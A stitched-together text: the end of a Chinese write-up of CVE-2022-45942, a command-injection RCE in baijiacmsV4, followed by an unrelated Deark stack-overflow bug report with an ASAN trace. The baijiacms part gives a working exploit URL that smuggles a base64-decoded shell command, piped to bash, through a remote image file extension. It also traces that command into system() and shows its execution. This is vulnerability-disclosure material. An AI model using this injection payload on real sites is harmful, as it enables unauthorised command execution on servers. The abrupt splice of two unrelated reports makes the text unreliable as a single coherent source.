    *   &
    *   “
    *   ’
    *   <
    *   \>
*   后缀 (pathinfo())
    
    *   includes/baijiacms/common.inc.php line 617 :$extention = pathinfo($url,PATHINFO\_EXTENSION );
    *   .
*   file\_get\_contents()
    
    *   includes/baijiacms/common.inc.php line632 :if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    *   空格
*   文件名
    
    *   web服务器系统类型，在windows下限制颇多
    *   windows
        *   \\
        *   /
        *   :
        *   \*
        *   ?
        *   |
    *   linux
        *   /

**htmlspecialchars()**

在该系统中，所有的参数都会经过includes/baijiacms.php进行htmlspecialchars过滤

所以payload中首先排除了 < > “ ‘ &这些符号

**pathinfo()**

pathinfo()会返回文件路径的信息

1  

$extention = pathinfo($url,PATHINFO\_EXTENSION );  

代码中传入了PATHINFO\_EXTENSION参数，根据官方介绍，传入该参数，只会返回最后一个扩展名，扩展名以 . 划分。结合后面的分析，所以payload只能存在与扩展名中

**file\_get\_contents()**

这一步有两个条件，首先file\_get\_contents()需要可以get到文件，其次文件中需要有内容满足file\_put\_contents()

1  

if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false)   

**$settings\[‘image\_compress\_openscale’\]**

最后在file\_save()中还有一步

1  

if(!empty($settings\['image\_compress\_openscale'\]))  

这一步在略读了代码后才知道，它由函数globaPriveteSystemSetting()获的，取自数据库中。

略读代码后才知道，这个需要在后台中开启图片上传压缩才会在数据库中建立数据。以便后续读取。

所以需要在后台的附件设置中开启并设置图片压缩比例（具体数字随意）

**具体利用过程解析**

EXP:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/\[whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;\](http://42.193.178.194/whoami.%3Becho%24{IFS}d2hvYW1p|base64%24{IFS}-d|bash%3B)&status=1&beid=1

这端url中，主要起作用的是url参数，其他的只是陪跑的（但是也不能删）。url参数原本是远程图片地址。

首先在自己的vps上设置payload，这里我设置的命令为whoami，为了便于区分payload，文件名也取名为whoami。然后使用python开启web服务。

然后登录baijiacms后台，设置一个压缩比例，保存，然后访问

http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.%3Becho%24%7BIFS%7Dd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash%3B&status=1&beid=1

然后我们来看debug。

代码运行到fetch\_net\_file\_upload函数中，走到$extention = pathinfo($url,PATHINFO\_EXTENSION );时，截取到了payload：;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

随后是mkdir根据时间，后缀，建立文件夹。之后来到if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) 进行判断，这边我为了方便查看file\_get\_contents和file\_put\_contents哪个会出问题，多加了两行代码。

1  
2  

$flag1 = file\_put\_contents($file\_tmp\_name,"1");  
$flag2 = file\_get\_contents($url);  

在这里之后进入file\_save() 。传入了关键的变量

$file\_full\_path：/www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/G55bRGvfRVr00o3.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

这边经过几个判断后，最后到达system()，最终传入的命令为。

convert -quality 100 /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash; /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

由于代码中会根据后缀建立文件夹，所以在system中，payload一共会执行四次，也就是为什么在执行whoami这个payload是，会输出4个www。

**nothing**

1.  在写测试的命令时，如果要用到ping dnslog这类命令，由于linux默认是会一直ping下去的。所以最好加一个-c 4限制次数（系统被搞崩了好多次）
    
2.  php中单引号的字符串和双引号的字符串差距还是挺大的。https://www.cnblogs.com/youxin/archive/2012/02/13/2348551.html。因为这个特性，测试的时候被卡了好久

CVE-2022-45942: baijiacmsV4 后台RCE | This_is_Y

Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c.

**Description**

A stack-buffer-overflow bug was discovered in function do\_prism\_read\_palette modules/atari-img.c:331

**Version**

Version v1.6.2 (Lastest commit)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce**

Command

    git clone the Lastest Version firstly.
    make && make install
    ./deark -l -zip ./poc
    

POC file at the bottom of this report.

**ASAN Report**

    Module: prismpaint
    =================================================================
    ==20784==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc6490a820 at pc 0x55eae0de20ff bp 0x7ffc6490a390 sp 0x7ffc6490a380
    READ of size 4 at 0x7ffc6490a820 thread T0
        #0 0x55eae0de20fe in do_prism_read_palette modules/atari-img.c:331
        #1 0x55eae0de247e in de_run_prismpaint modules/atari-img.c:361
        #2 0x55eae0fd7023 in de_run_module src/deark-util.c:878
        #3 0x55eae0fd7023 in de_run_module src/deark-util.c:843
        #4 0x55eae1036a35 in de_run src/deark-user.c:452
        #5 0x55eae0dc39e9 in main2 src/deark-cmd.c:988
        #6 0x55eae0dc39e9 in main src/deark-cmd.c:1022
        #7 0x7fd587ac4082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x55eae0dc652d in _start (/AFLplusplus/my_test/deark/backup/asan/deark-master/deark+0xf652d)
    
    Address 0x7ffc6490a820 is located in stack of thread T0 at offset 1056 in frame
        #0 0x55eae0de1c7f in do_prism_read_palette modules/atari-img.c:304
    
      This frame has 2 object(s):
        [32, 1056) 'pal1' (line 308) <== Memory access at offset 1056 overflows this variable
        [1184, 1216) 'tmps' (line 310)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow modules/atari-img.c:331 in do_prism_read_palette
    Shadow bytes around the buggy address:
      0x10000c9194b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000c919500: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10000c919510: f2 f2 f2 f2 00 00 00 00 f3 f3 f3 f3 00 00 00 00
      0x10000c919520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    
    

**POC**

id\_000027,sig\_11,src\_013544+002505,time\_31840218,execs\_68965869,op\_splice,rep\_16.zip

Any issue plz contact with me:  
asteriska001@gmail.com  
OR:  
twitter: @Asteriska8

Tag

#ubuntu